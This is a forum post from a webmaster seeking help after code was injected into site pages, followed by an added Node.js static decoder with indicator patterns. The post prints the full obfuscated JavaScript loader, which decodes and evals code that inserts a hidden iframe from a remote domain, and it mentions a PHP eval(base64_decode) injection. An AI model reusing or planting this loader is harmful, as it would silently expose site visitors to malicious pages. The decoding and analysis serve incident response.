Hello,
One of my sites has been hacked.
Code was injected into two pages.
Here is the code:
Which, once decoded, gives:
Code:
eval(base64_decode('...'));
I assume the JS is encoded. By the way, could someone tell me what it contains???
Code:
2 <script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n="1.5$1.5$49.5$48$13$17$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$17.5$58.5$3.5$1.5$1.5$1.5$49.5$48$54$45.5$51.5$47.5$54$17$17.5$26.5$3.5$1.5$1.5$59.5$13$47.5$51$54.5$47.5$13$58.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$56.5$54$49.5$55$47.5$17$14$27$49.5$48$54$45.5$51.5$47.5$13$54.5$54$46.5$27.5$16.5$49$55$55$53$26$20.5$20.5$51.5$52.5$55.5$58$57.5$57.5$58$45.5$20$51.5$57.5$48$55$53$20$52$45.5$51.5$47.5$20.5$47$20.5$23$21$23$20$53$49$53$28.5$48.5$52.5$27.5$21.5$16.5$13$56.5$49.5$47$55$49$27.5$16.5$21.5$21$16.5$13$49$47.5$49.5$48.5$49$55$27.5$16.5$21.5$21$16.5$13$54.5$55$57.5$51$47.5$27.5$16.5$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$26$49$49.5$47$47$47.5$52$26.5$53$52.5$54.5$49.5$55$49.5$52.5$52$26$45.5$46$54.5$52.5$51$55.5$55$47.5$26.5$51$47.5$48$55$26$21$26.5$55$52.5$53$26$21$26.5$16.5$28$27$20.5$49.5$48$54$45.5$51.5$47.5$28$14$17.5$26.5$3.5$1.5$1.5$59.5$3.5$1.5$1.5$48$55.5$52$46.5$55$49.5$52.5$52$13$49.5$48$54$45.5$51.5$47.5$54$17$17.5$58.5$3.5$1.5$1.5$1.5$56$45.5$54$13$48$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$49.5$48$54$45.5$51.5$47.5$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$54.5$54$46.5$16.5$19$16.5$49$55$55$53$26$20.5$20.5$51.5$52.5$55.5$58$57.5$57.5$58$45.5$20$51.5$57.5$48$55$53$20$52$45.5$51.5$47.5$20.5$47$20.5$23$21$23$20$53$49$53$28.5$48.5$52.5$27.5$21.5$16.5$17.5$26.5$48$20$54.5$55$57.5$51$47.5$20$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$27.5$16.5$49$49.5$47$47$47.5$52$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$53$52.5$54.5$49.5$55$49.5$52.5$52$27.5$16.5$45.5$46$54.5$52.5$51$55.5$5
5$47.5$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$51$47.5$48$55$27.5$16.5$21$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$55$52.5$53$27.5$16.5$21$16.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$56.5$49.5$47$55$49$16.5$19$16.5$21.5$21$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$49$47.5$49.5$48.5$49$55$16.5$19$16.5$21.5$21$16.5$17.5$26.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$48$17.5$26.5$3.5$1.5$1.5$59.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2-1;i-591!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);}</script>
So, several questions:
- Has anyone already run into this problem?
- How did the hacker do it?
- I had FCKEDITOR, and while searching on Google I read that it could come from a vulnerability in it...
Thanks in advance for your insights...
PS: I compared the directories of my backup with those of the hacked site. No new files...
Latest news:
I deleted all the directories and all the files of my site, then I uploaded to my server the backup of my index.php (clean), putting it in maintenance mode, followed by 3 directories: images, include (clean files) and template (clean files).
I go back to my site and my index is infected again!!!!
Any ideas?
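Added example, not part of the original post: the script above rebuilds its real code from the `$`-separated numbers with `String.fromCharCode(-1*h*(3+n[k]))`, where `h = -012/5 = -2` (012 is an octal literal), and then passes the result to `eval`. The Node.js sketch below decodes such a list statically, without executing anything; the function names, the indicator list and the sample string are assumptions constructed for illustration.

```javascript
// Static decoder for the "$"-separated number obfuscation. Nothing here calls eval().

// The loader computes h = -012/5. 012 is a legacy octal literal (decimal 10),
// so h = -2 and each character code is -1 * h * (3 + n) = 2 * (3 + n).
const H = -parseInt('012', 8) / 5;

// Pull the longest quoted run of "$"-separated numbers out of a script's source text.
function extractNumberList(scriptSource) {
  const runs = scriptSource.match(/["'](\d+(?:\.\d+)?(?:\$\d+(?:\.\d+)?)+)["']/g) || [];
  if (runs.length === 0) return null;
  const longest = runs.reduce((a, b) => (b.length > a.length ? b : a));
  return longest.slice(1, -1); // drop the surrounding quotes
}

// Turn the number list back into text, rejecting tokens that are not valid codes.
function decodeNumberList(list, h = H) {
  return list.split('$').map((tok) => {
    const code = -1 * h * (3 + Number(tok));
    if (!Number.isInteger(code) || code < 0 || code > 0xffff) {
      throw new RangeError(`token ${tok} does not decode to a character code`);
    }
    return String.fromCharCode(code);
  }).join('');
}

// Hypothetical indicator list: strings worth flagging in decoded injected code.
const INDICATORS = [/iframe/i, /document\.write/i, /createElement/i, /https?:\/\//i];

function analyse(scriptSource) {
  const list = extractNumberList(scriptSource);
  if (list === null) return { decoded: null, hits: [] };
  const decoded = decodeNumberList(list);
  const hits = INDICATORS.filter((re) => re.test(decoded)).map((re) => re.source);
  return { decoded, hits };
}

// Constructed sample using the same encoding (not the payload from the post).
const SAMPLE = '<script>h=-012/5;n="46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55' +
  '$17$16.5$49.5$48$54$45.5$51.5$47.5$16.5$17.5"["split"]("$");</script>';

console.log(analyse(SAMPLE));
```

Run it against a saved copy of the infected page rather than opening that page in a browser.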